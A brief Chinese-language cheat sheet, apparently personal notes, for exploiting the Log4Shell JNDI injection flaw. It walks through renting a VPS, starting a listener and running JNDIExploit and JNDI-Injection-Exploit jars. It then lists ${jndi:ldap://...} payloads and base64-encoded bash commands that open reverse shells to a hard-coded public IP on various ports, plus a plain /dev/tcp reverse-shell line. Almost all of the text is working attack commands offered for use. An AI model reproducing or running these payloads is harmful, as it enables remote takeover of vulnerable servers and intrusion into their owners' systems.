1、买VPS,打开mobax进行ssh连接,开两个终端
一个终端开启监听
另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令
cpp
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 116.62.152.84
生成payload
构造payload
cpp
${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx}
输入进去之后看结果
反弹shell成功
结束
cpp
bash -i >& /dev/tcp/116.62.152.84/2220>&1
java -jarJNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzIyMzIgMD4mMQ==}|{base64,-d}|{bash,-i}"-A 116.62.152.84
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDI0IDA+JjE=
50024
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDI0IDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.84
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDIwIDA+JjE=
50020
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDIwIDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.84
50019
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDE5IDA+JjE=
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDE5IDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.84
ldap://172.31.135.21:1389/dddxhj
c=${jndi:ldap://172.31.135.21:1389/dddxhj}
c=${jndi:ldap://172.31.135.21:1389/yqffbb}
c=${jndi:ldap://172.31.135.21:1389/f54nch}
payload
${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC80NCAwPiYx}
${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx}
c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx